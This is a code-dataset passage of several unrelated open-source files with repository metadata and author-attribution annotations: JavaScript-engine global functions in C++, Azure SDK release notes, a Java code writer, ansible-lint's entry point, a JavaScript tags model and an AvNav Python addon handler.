// other StrWhiteSpaceChar values as well.
return s.toDouble(true /*tolerant*/, false /* NaN for empty string */);
}
// Host implementation of the global eval(). Only callable with a `this`
// value that unwraps to the global object whose eval function is being
// invoked; anything else is an EvalError. Non-string arguments are returned
// unchanged.
AJValue JSC_HOST_CALL globalFuncEval(ExecState* exec, AJObject* function, AJValue thisValue, const ArgList& args)
{
    AJObject* thisObject = thisValue.toThisObject(exec);
    AJObject* unwrappedObject = thisObject->unwrappedObject();
    if (!unwrappedObject->isGlobalObject() || static_cast<AJGlobalObject*>(unwrappedObject)->evalFunction() != function)
        return throwError(exec, EvalError, "The \"this\" value passed to eval must be the global object from which eval originated");
    AJValue x = args.at(0);
    if (!x.isString())
        return x; // non-string argument returned unchanged
    UString s = x.toString(exec);
    // Fast path: JSON-like literals can be parsed without the full compiler.
    LiteralParser preparser(exec, s, LiteralParser::NonStrictJSON);
    if (AJValue parsedObject = preparser.tryLiteralParse())
        return parsedObject;
    RefPtr<EvalExecutable> eval = EvalExecutable::create(exec, makeSource(s));
    AJObject* error = eval->compile(exec, static_cast<AJGlobalObject*>(unwrappedObject)->globalScopeChain().node());
    if (error)
        return throwError(exec, error);
    return exec->interpreter()->execute(eval.get(), exec, thisObject, static_cast<AJGlobalObject*>(unwrappedObject)->globalScopeChain().node(), exec->exceptionSlot());
}
// Host implementation of the global parseInt().
AJValue JSC_HOST_CALL globalFuncParseInt(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    AJValue value = args.at(0);
    int32_t radix = args.at(1).toInt32(exec);
    // An explicit radix other than 10 always goes through the string parser.
    if (radix != 0 && radix != 10)
        return jsNumber(exec, parseInt(value.toString(exec), radix));
    // Fast paths for radix 0/10: numeric values can be truncated directly
    // without a string round trip.
    if (value.isInt32())
        return value;
    if (value.isDouble()) {
        double d = value.asDouble();
        if (isfinite(d))
            return jsNumber(exec, (d > 0) ? floor(d) : ceil(d)); // truncate toward zero
        if (isnan(d) || isinf(d))
            return jsNaN(exec);
        return jsNumber(exec, 0);
    }
    // Everything else (strings, objects, ...) uses the full parser.
    return jsNumber(exec, parseInt(value.toString(exec), radix));
}
AJValue JSC_HOST_CALL globalFuncParseFloat(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    // Host implementation of the global parseFloat().
    const UString text = args.at(0).toString(exec);
    return jsNumber(exec, parseFloat(text));
}
AJValue JSC_HOST_CALL globalFuncIsNaN(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    // True when ToNumber(argument) is NaN.
    const double value = args.at(0).toNumber(exec);
    return jsBoolean(isnan(value));
}
AJValue JSC_HOST_CALL globalFuncIsFinite(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    // True when ToNumber(argument) is neither NaN nor +/- Infinity.
    const double value = args.at(0).toNumber(exec);
    const bool finite = !isnan(value) && !isinf(value);
    return jsBoolean(finite);
}
AJValue JSC_HOST_CALL globalFuncDecodeURI(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    // decodeURI leaves the URI's structural characters encoded so the result
    // can still be parsed as a complete URI.
    static const char reservedSet[] = "#$&+,/:;=?@";
    return decode(exec, args, reservedSet, true);
}
AJValue JSC_HOST_CALL globalFuncDecodeURIComponent(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    // decodeURIComponent decodes every escape sequence: nothing is reserved.
    static const char nothingReserved[] = "";
    return decode(exec, args, nothingReserved, true);
}
AJValue JSC_HOST_CALL globalFuncEncodeURI(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    // encodeURI leaves alphanumerics, URI structural characters and
    // unreserved marks intact; everything else is percent-encoded.
    static const char uriUnescapedSet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz"
        "0123456789"
        "!#$&'()*+,-./:;=?@_~";
    return encode(exec, args, uriUnescapedSet);
}
AJValue JSC_HOST_CALL globalFuncEncodeURIComponent(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    // encodeURIComponent also encodes the URI structural characters, leaving
    // only alphanumerics and unreserved marks intact.
    static const char componentUnescapedSet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz"
        "0123456789"
        "!'()*-._~";
    return encode(exec, args, componentUnescapedSet);
}
// Legacy escape(): code units above 0xFF become %uXXXX; Latin-1 characters
// outside do_not_escape become %XX; everything else passes through.
AJValue JSC_HOST_CALL globalFuncEscape(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    static const char do_not_escape[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz"
        "0123456789"
        "*+-./@_";
    AJStringBuilder builder;
    UString str = args.at(0).toString(exec);
    const UChar* c = str.data();
    for (unsigned k = 0; k < str.size(); k++, c++) {
        int u = c[0];
        if (u > 255) {
            // Non-Latin-1 code unit: wide "%uXXXX" form.
            char tmp[7];
            snprintf(tmp, sizeof(tmp), "%%u%04X", u);
            builder.append(tmp);
        } else if (u != 0 && strchr(do_not_escape, static_cast<char>(u)))
            builder.append(c, 1); // pass through untouched
        else {
            char tmp[4];
            snprintf(tmp, sizeof(tmp), "%%%02X", u);
            builder.append(tmp);
        }
    }
    return builder.build(exec);
}
// Legacy unescape(): replaces %uXXXX and %XX escapes with the code units
// they denote; malformed escapes are copied through unchanged.
AJValue JSC_HOST_CALL globalFuncUnescape(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    StringBuilder builder;
    UString str = args.at(0).toString(exec);
    int k = 0;
    int len = str.size();
    while (k < len) {
        const UChar* c = str.data() + k;
        // When an escape is recognized, c is re-pointed at the local `u`
        // holding the decoded unit, so the append below picks it up.
        UChar u;
        if (c[0] == '%' && k <= len - 6 && c[1] == 'u') {
            if (isASCIIHexDigit(c[2]) && isASCIIHexDigit(c[3]) && isASCIIHexDigit(c[4]) && isASCIIHexDigit(c[5])) {
                u = Lexer::convertUnicode(c[2], c[3], c[4], c[5]);
                c = &u;
                k += 5;
            }
        } else if (c[0] == '%' && k <= len - 3 && isASCIIHexDigit(c[1]) && isASCIIHexDigit(c[2])) {
            u = UChar(Lexer::convertHex(c[1], c[2]));
            c = &u;
            k += 2;
        }
        k++;
        builder.append(*c);
    }
    return jsString(exec, builder.build());
}
#ifndef NDEBUG
AJValue JSC_HOST_CALL globalFuncJSCPrint(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
    // Debug-only helper: write the first argument (as UTF-8) to stdout.
    const CString utf8 = args.at(0).toString(exec).UTF8String();
    puts(utf8.data());
    return jsUndefined();
}
#endif
} // namespace AJ
|
C++
|
Apache-2.0
|
PioneerLab/OpenAphid-AJ/DISCONTINUED/runtime/AJGlobalObjectFunctions.cpp
|
c461ad0a-0585-4d2b-8cd7-08a02e3c021c
|
[{"tag": "NAME", "value": "Cameron Zwarich", "start": 786, "end": 801, "context": " Inc. All rights reserved.\n * Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 M"}, {"tag": "EMAIL", "value": "cwzwarich@uwaterloo.ca", "start": 803, "end": 825, "context": "reserved.\n * Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 Maks Orlovich\n *\n * This"}, {"tag": "NAME", "value": "Peter Kelly", "start": 645, "end": 656, "context": "ri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com)\n * Copyright (C) 2003, 2004, 2005"}, {"tag": "EMAIL", "value": "porten@kde.org", "start": 606, "end": 620, "context": "\n\n*/\n/*\n * Copyright (C) 1999-2002 Harri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com"}, {"tag": "EMAIL", "value": "pmk@post.com", "start": 658, "end": 670, "context": "rten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com)\n * Copyright (C) 2003, 2004, 2005, 2006, 2007, "}, {"tag": "NAME", "value": "Maks Orlovich", "start": 850, "end": 863, "context": "h (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 Maks Orlovich\n *\n * This library is free software; you can red"}, {"tag": "NAME", "value": "Harri Porten", "start": 592, "end": 604, "context": "r the License.\n\n*/\n/*\n * Copyright (C) 1999-2002 Harri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kel"}]
|
[{"tag": "NAME", "value": "Cameron Zwarich", "start": 786, "end": 801, "context": " Inc. All rights reserved.\n * Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 M"}, {"tag": "EMAIL", "value": "cwzwarich@uwaterloo.ca", "start": 803, "end": 825, "context": "reserved.\n * Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 Maks Orlovich\n *\n * This"}, {"tag": "NAME", "value": "Peter Kelly", "start": 645, "end": 656, "context": "ri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com)\n * Copyright (C) 2003, 2004, 2005"}, {"tag": "EMAIL", "value": "porten@kde.org", "start": 606, "end": 620, "context": "\n\n*/\n/*\n * Copyright (C) 1999-2002 Harri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com"}, {"tag": "EMAIL", "value": "pmk@post.com", "start": 658, "end": 670, "context": "rten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com)\n * Copyright (C) 2003, 2004, 2005, 2006, 2007, "}, {"tag": "NAME", "value": "Maks Orlovich", "start": 850, "end": 863, "context": "h (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 Maks Orlovich\n *\n * This library is free software; you can red"}, {"tag": "NAME", "value": "Harri Porten", "start": 592, "end": 604, "context": "r the License.\n\n*/\n/*\n * Copyright (C) 1999-2002 Harri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kel"}]
|
---
title: Azure SDK for Python (November 2020)
layout: post
tags: python
sidebar: releases_sidebar
repository: azure/azure-sdk-for-python
---
The Azure SDK team is pleased to make available the November 2020 client library release.
#### GA
- _Add packages_
#### Updates
- _Add packages_
#### Beta
- Service Bus
- Search
- Metrics Advisor
- Eventgrid
- Form Recognizer
## Installation Instructions
To install the latest beta version of the packages, copy and paste the following commands into a terminal:
```bash
pip install azure-servicebus --pre
pip install azure-search-documents --pre
pip install azure-ai-metricsadvisor --pre
pip install azure-eventgrid --pre
pip install azure-ai-formrecognizer --pre
```
## Feedback
If you have a bug or feature request for one of the libraries, please post an issue to [GitHub](https://github.com/azure/azure-sdk-for-python/issues).
## Release highlights
### Service Bus [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/master/sdk/servicebus/azure-servicebus/CHANGELOG.md)
#### New Features
* Addition of `timeout` parameter to sending, lock renewal, and settlement functions.
* Addition of `auto_lock_renewer` parameter when getting a receiver to opt-into auto-registration of lock renewal for messages on receipt (or, if a session receiver, the session on open).
#### Breaking changes
* Significant renames across parameter, entity, and exception types such as utilizing a ServiceBus prefix, e.g. `ServiceBusMessage`.
* Refactors all service-impacting operations from the `ServiceBusMessage` object onto the `ServiceBusReceiver` object itself, e.g. lock renewal and settlement.
* `get_*_session_receiver` functions have been incorporated into their `get_*_receiver` counterparts, activated by passing a `session_id` parameter.
* Continued Exception behavior cleanup, normalization, and documentation, as well as naming polish in line with the broad name prefix alignment.
### Metrics Advisor [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/master/sdk/metricsadvisor/azure-ai-metricsadvisor/CHANGELOG.md)
#### Breaking Changes
- Significant renames across parameters and methods. Please go to the [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/master/sdk/metricsadvisor/azure-ai-metricsadvisor/CHANGELOG.md) for detail information.
### Form Recognizer [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/master/sdk/formrecognizer/azure-ai-formrecognizer/CHANGELOG.md)
This version of the SDK defaults to the latest supported API version, which currently is v2.1-preview.
#### New Features
- Support for two new prebuilt recognition models for invoices and business cards through the
`begin_recognize_invoices()` and `begin_recognize_business_cards()` methods (as well as their `from_url` counterparts)
of `FormRecognizerClient`.
- Support for selection marks as a new fundamental form element. This type is supported in content recognition and in
training/recognizing custom forms (labeled only).
- Support for creating composed models from a collection of existing models (trained with labels) through the
`begin_create_composed_model()` method of `FormTrainingClient`.
- A `model_name` keyword argument added for model training (both `begin_training()` and `begin_create_composed_model()`) that
can specify a human-readable name for a model.
- Support for the bitmap image format (with content type "image/bmp") in prebuilt model recognition and content recognition.
- A `locale` keyword argument added for all prebuilt model methods, allowing for the specification of a document's origin to assist the
service with correct analysis of the document's content.
- A `language` keyword argument added for the content recognition method `begin_recognize_content()` that specifies which
language to process the document in.
- A `pages` keyword argument added for the content recognition method `begin_recognize_content()` that specifies which pages
in a multi-page document should be analyzed.
- Additional properties added to response models - see Changelog for detailed information.
## Latest Releases
View all the latest versions of Python packages [here][python-latest-releases].
{% include refs.md %}
|
Markdown
|
MIT
|
DominikMe/azure-sdk/releases/2020-11/python.md
|
b5f44525-e83c-4631-b0ca-d03ff55b2b4e
|
[]
|
[]
|
/*
* Copyright (c) 1997, 2010, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package com.sun.codemodel.internal.writer;
import java.io.FilterOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
import com.sun.codemodel.internal.CodeWriter;
import com.sun.codemodel.internal.JPackage;
/**
* Output all source files into a single stream with a little
* formatting header in front of each file.
*
* This is primarily for human consumption of the generated source
* code, such as to debug/test CodeModel or to quickly inspect the result.
*
* @author
* Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)
*/
public class SingleStreamCodeWriter extends CodeWriter {

    /** Shared destination that receives every generated source file. */
    private final PrintStream out;

    /**
     * @param os
     *      This stream will be closed at the end of the code generation.
     */
    public SingleStreamCodeWriter( OutputStream os ) {
        out = new PrintStream(os);
    }

    public OutputStream openBinary(JPackage pkg, String fileName) throws IOException {
        // Print a banner naming the file, then hand back a stream whose
        // close() is a no-op so a caller cannot close the shared stream.
        String qualifiedName = pkg.name();
        if (qualifiedName.length() != 0)
            qualifiedName += '.';
        qualifiedName += fileName;

        out.println(
            "-----------------------------------" + qualifiedName
            + "-----------------------------------");

        return new FilterOutputStream(out) {
            @Override
            public void close() {
                // don't let this stream close
            }
        };
    }

    public void close() throws IOException {
        out.close();
    }
}
|
Java
|
MIT
|
jsycdut/source-code/openjdk8/openjdk/jaxws/src/share/jaxws_classes/com/sun/codemodel/internal/writer/SingleStreamCodeWriter.java
|
20ba0cb3-a1d4-4ae6-9dd0-e42eda28e504
|
[{"tag": "NAME", "value": "Kohsuke Kawaguchi", "start": 1747, "end": 1764, "context": "quickly inspect the result.\n *\n * @author\n * Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)\n */\npublic class Sing"}, {"tag": "EMAIL", "value": "kohsuke.kawaguchi@sun.com", "start": 1766, "end": 1791, "context": " result.\n *\n * @author\n * Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)\n */\npublic class SingleStreamCodeWriter extends "}]
|
[{"tag": "NAME", "value": "Kohsuke Kawaguchi", "start": 1747, "end": 1764, "context": "quickly inspect the result.\n *\n * @author\n * Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)\n */\npublic class Sing"}, {"tag": "EMAIL", "value": "kohsuke.kawaguchi@sun.com", "start": 1766, "end": 1791, "context": " result.\n *\n * @author\n * Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)\n */\npublic class SingleStreamCodeWriter extends "}]
|
#!/usr/bin/env python
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
import errno
import optparse
import sys
import ansiblelint
import ansiblelint.formatters as formatters
import six
from ansiblelint import RulesCollection
from ansiblelint.version import __version__
import yaml
import os
def load_config(config_file):
    """Load lint options from a YAML configuration file.

    Uses ``config_file`` when given, otherwise falls back to a
    ``.ansible-lint`` file in the current directory.

    Returns the parsed document (normally a dict) or None when the file is
    missing or contains invalid YAML.
    """
    config_path = config_file if config_file else ".ansible-lint"
    if os.path.exists(config_path):
        with open(config_path, "r") as stream:
            try:
                # safe_load avoids the arbitrary object construction that a
                # bare yaml.load() permits on untrusted files, and is the
                # recommended replacement for load() without a Loader.
                return yaml.safe_load(stream)
            except yaml.YAMLError:
                # Invalid YAML is treated the same as no config file.
                pass
    return None
def main():
    """Command-line entry point for ansible-lint.

    Parses options (optionally merged with values from a .ansible-lint
    config file), builds the rule collection, lints every playbook given on
    the command line and prints the matches.

    Returns a shell exit code: 0 when clean or a listing was requested,
    1 for a usage error, 2 when lint matches were found.
    """
    formatter = formatters.Formatter()

    # ---- command-line definition ----------------------------------------
    parser = optparse.OptionParser("%prog [options] playbook.yml [playbook2 ...]",
                                   version="%prog " + __version__)
    parser.add_option('-L', dest='listrules', default=False,
                      action='store_true', help="list all the rules")
    parser.add_option('-q', dest='quiet',
                      default=False,
                      action='store_true',
                      help="quieter, although not silent output")
    parser.add_option('-p', dest='parseable',
                      default=False,
                      action='store_true',
                      help="parseable output in the format of pep8")
    parser.add_option('-r', action='append', dest='rulesdir',
                      default=[], type='str',
                      help="specify one or more rules directories using "
                           "one or more -r arguments. Any -r flags override "
                           "the default rules in %s, unless -R is also used."
                           % ansiblelint.default_rulesdir)
    parser.add_option('-R', action='store_true',
                      default=False,
                      dest='use_default_rules',
                      help="Use default rules in %s in addition to any extra "
                           "rules directories specified with -r. There is "
                           "no need to specify this if no -r flags are used"
                           % ansiblelint.default_rulesdir)
    parser.add_option('-t', dest='tags',
                      action='append',
                      default=[],
                      help="only check rules whose id/tags match these values")
    parser.add_option('-T', dest='listtags', action='store_true',
                      help="list all the tags")
    parser.add_option('-v', dest='verbosity', action='count',
                      help="Increase verbosity level",
                      default=0)
    parser.add_option('-x', dest='skip_list', default=[], action='append',
                      help="only check rules whose id/tags do not " +
                           "match these values")
    parser.add_option('--nocolor', dest='colored',
                      default=hasattr(sys.stdout, 'isatty') and sys.stdout.isatty(),
                      action='store_false',
                      help="disable colored output")
    parser.add_option('--force-color', dest='colored',
                      action='store_true',
                      help="Try force colored output (relying on ansible's code)")
    parser.add_option('--exclude', dest='exclude_paths', action='append',
                      help='path to directories or files to skip. This option'
                           ' is repeatable.',
                      default=[])
    parser.add_option('-c', help='Specify configuration file to use.  Defaults to ".ansible-lint"')
    options, args = parser.parse_args(sys.argv[1:])

    # ---- merge config-file values ---------------------------------------
    # Booleans are OR-ed with the command line, verbosity is additive, and
    # list-valued options are concatenated (command line values first).
    config = load_config(options.c)

    if config:
        if 'quiet' in config:
            options.quiet = options.quiet or config['quiet']

        if 'parseable' in config:
            options.parseable = options.parseable or config['parseable']

        if 'use_default_rules' in config:
            options.use_default_rules = options.use_default_rules or config['use_default_rules']

        if 'verbosity' in config:
            options.verbosity = options.verbosity + config['verbosity']

        if 'exclude_paths' in config:
            options.exclude_paths = options.exclude_paths + config['exclude_paths']

        if 'rulesdir' in config:
            options.rulesdir = options.rulesdir + config['rulesdir']

        if 'skip_list' in config:
            options.skip_list = options.skip_list + config['skip_list']

        if 'tags' in config:
            options.tags = options.tags + config['tags']

    if options.quiet:
        formatter = formatters.QuietFormatter()

    if options.parseable:
        formatter = formatters.ParseableFormatter()

    # A playbook argument is required unless we are only listing rules/tags.
    if len(args) == 0 and not (options.listrules or options.listtags):
        parser.print_help(file=sys.stderr)
        return 1

    if options.use_default_rules:
        rulesdirs = options.rulesdir + [ansiblelint.default_rulesdir]
    else:
        rulesdirs = options.rulesdir or [ansiblelint.default_rulesdir]

    rules = RulesCollection()
    for rulesdir in rulesdirs:
        rules.extend(RulesCollection.create_from_directory(rulesdir))

    if options.listrules:
        print(rules)
        return 0

    if options.listtags:
        print(rules.listtags())
        return 0

    if isinstance(options.tags, six.string_types):
        options.tags = options.tags.split(',')

    # Each -x value may itself be a comma-separated list of tags/ids.
    skip = set()
    for s in options.skip_list:
        skip.update(s.split(','))
    options.skip_list = frozenset(skip)

    playbooks = set(args)
    matches = list()
    checked_files = set()
    for playbook in playbooks:
        runner = ansiblelint.Runner(rules, playbook, options.tags,
                                    options.skip_list, options.exclude_paths,
                                    options.verbosity, checked_files)
        matches.extend(runner.run())

    # Stable output ordering: by file, then line number, then rule id.
    matches.sort(key=lambda x: (x.filename, x.linenumber, x.rule.id))

    for match in matches:
        print(formatter.format(match, options.colored))

    if len(matches):
        return 2
    else:
        return 0
if __name__ == "__main__":
    try:
        sys.exit(main())
    except IOError as exc:
        # A closed pipe (e.g. `ansible-lint ... | head`) is not worth a
        # traceback; re-raise any other I/O error.
        if exc.errno != errno.EPIPE:
            raise
    except RuntimeError as e:
        # Present runtime failures as a clean exit message, no traceback.
        raise SystemExit(str(e))
|
Python
|
MIT
|
Chrislyle8/Test/lib/ansiblelint/__main__.py
|
857a888e-5f69-442b-ae26-a7df7909ebc2
|
[{"tag": "EMAIL", "value": "will@thames.id.au", "start": 62, "end": 79, "context": "nv python\n\n# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>\n#\n# Permission is hereby granted, free of charge"}, {"tag": "NAME", "value": "Will Thames", "start": 49, "end": 60, "context": "#!/usr/bin/env python\n\n# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>\n#\n# Permission is hereby gran"}]
|
[{"tag": "EMAIL", "value": "will@thames.id.au", "start": 62, "end": 79, "context": "nv python\n\n# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>\n#\n# Permission is hereby granted, free of charge"}, {"tag": "NAME", "value": "Will Thames", "start": 49, "end": 60, "context": "#!/usr/bin/env python\n\n# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>\n#\n# Permission is hereby gran"}]
|
/**
* @author {benyuwan@gmail.com}
* @file tags的model
*/
import query from '../utils/query'
import escape from '../utils/escape'
/** Data-access layer for article tags. */
class Tags {
    /**
     * Overwrite the tags stored for one article.
     * @param id   article primary key
     * @param tags new tags value
     * @returns promise resolving with the query result
     */
    async updateTag(id, tags) {
        const sql = escape`UPDATE ARTICLE SET tags=${tags} WHERE id=${id}`
        return await query(sql)
    }
}

export default new Tags()
|
JavaScript
|
MIT
|
StudentWan/ashen-blog/server/models/tags.js
|
0e759623-bbc5-46ec-a592-3243cba2fc25
|
[{"tag": "EMAIL", "value": "benyuwan@gmail.com", "start": 16, "end": 34, "context": "/**\n * @author {benyuwan@gmail.com}\n * @file tags\u7684model\n */\n\nimport query from '../u"}]
|
[{"tag": "EMAIL", "value": "benyuwan@gmail.com", "start": 16, "end": 34, "context": "/**\n * @author {benyuwan@gmail.com}\n * @file tags\u7684model\n */\n\nimport query from '../u"}]
|
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# parts from this software (AIS decoding) are taken from the gpsd project
# so refer to this BSD licencse also (see ais.py) or omit ais.py
# parts contributed by free-x https://github.com/free-x
# parts contributed by Matt Hawkins http://www.raspberrypi-spy.co.uk/
#
###############################################################################
import hashlib
import avnav_handlerList
from avnav_nmea import *
from avnav_worker import *
class AVNUserAppHandler(AVNWorker):
'''
handle the files in the user directory
'''
CHILDNAME="UserTool"
TYPE="addon"
  @classmethod
  def getStartupGroup(cls):
    # Startup ordering group 3 — presumably groups start in ascending order
    # so the handlers resolved in startInstance() already exist; confirm in
    # AVNWorker.
    return 3
  @classmethod
  def getPrefix(cls):
    # This handler registers no URL prefix of its own.
    return None
@classmethod
def getConfigParam(cls, child=None):
#we add this to the ones configured at HTTPServer
if child == cls.CHILDNAME:
return {
'url':None, #we replace $HOST...
'title':'',
'icon':None, #an icon below $datadir/user
'keepUrl':'' #auto detect
}
if not child is None:
return None
rt = {
'interval': '5',
}
return rt
  @classmethod
  def preventMultiInstance(cls):
    # Only a single instance of this handler is allowed.
    return True
  @classmethod
  def autoInstantiate(cls):
    # Instantiated automatically even without an explicit config entry.
    return True
  def __init__(self,param):
    # Sibling handler references stay None until startInstance() resolves them.
    self.userHandler=None # AVNUserHandler
    self.imagesHandler=None # AVNImagesHandler
    self.httpServer=None # AVNHTTPServer
    self.addonList=[] # merged user + server addon descriptions, built by fillList()
    self.additionalAddOns=[] # extra addons — presumably registered at runtime; not visible in this chunk
    AVNWorker.__init__(self,param)
def startInstance(self, navdata):
self.userHandler=self.findHandlerByName('AVNUserHandler')
if self.userHandler is None:
raise Exception("unable to find a user handler")
self.imagesHandler=self.findHandlerByName('AVNImagesHandler')
if self.imagesHandler is None:
raise Exception("unable to find an images handler")
self.httpServer = self.findHandlerByName('AVNHttpServer')
if self.httpServer is None:
raise Exception("unable to find AVNHttpServer")
super().startInstance(navdata)
  # thread run method - just try forever
  def run(self):
    sleepTime=self.getFloatParam('interval')
    self.setInfo('main', "starting", WorkerStatus.STARTED)
    # The addon list is built once at startup; the loop below only keeps the
    # worker alive, waking every 'interval' seconds until asked to stop.
    self.fillList()
    while not self.shouldStop():
      self.wait(sleepTime)
def computeKey(self,entry):
md5=hashlib.md5()
for k in ('url','icon','title'):
v=entry.get(k)
if v is not None:
try:
md5.update(v.encode('utf-8'))
except Exception as e:
AVNLog.error("unable to compute md5 for %s: %s",v,e)
return md5.hexdigest()
def fillList(self):
data = []
alreadyFound=set()
childlist = self.param.get(self.CHILDNAME)
if childlist is not None:
for child in childlist:
url=child.get('url')
key=self.computeKey(child)
if url is None:
child['invalid']=True
if key in alreadyFound:
AVNLog.error("duplicate user app found, ignoring %s",url)
while key in alreadyFound:
key = key + "x"
child['name']=key
child['invalid']=True
else:
child['name']=key
alreadyFound.add(key)
item=child.copy()
item['canDelete']=True
item['source']='user'
data.append(item)
serverAddons = self.httpServer.getParamValue(self.CHILDNAME)
nr=0
if serverAddons is not None:
for addon in serverAddons:
newAddon = addon.copy()
newAddon['canDelete']=False
newAddon['name']="server:%d"%nr
newAddon['source']='legacy'
nr+=1
data.append(newAddon)
for addon in data:
url = addon.get('url')
if url is None:
addon['invalid']=True
if not url.startswith("http"):
userFile = self.findFileForUrl(url)
if userFile is None:
AVNLog.error("error: user url %s not found", url)
addon['invalid']=True
if addon.get('title') == '':
del addon['title']
keepUrl = False
if addon.get('keepUrl') is None or addon.get('keepUrl') == '':
if addon.get('url').startswith("http"):
keepUrl = True
else:
if str(addon.get('keepUrl')).lower() == "true":
keepUrl = True
addon['keepUrl'] = keepUrl
icon = addon['icon']
if not icon.startswith("http"):
if not icon.startswith("/user"):
icon="/user/"+icon
addon['icon']=icon
iconpath = self.findFileForUrl(icon)
if iconpath is None:
AVNLog.error("icon path %s for %s not found, ignoring entry", icon, addon['url'])
addon['invalid'] = True
self.addonList=data
self.setInfo('main', "active, %d addons"%len(data), WorkerStatus.NMEA)
return
def findFileForUrl(self,url):
if url is None:
return None
if url.startswith("http"):
return None
(path,query)=self.httpServer.pathQueryFromUrl(url)
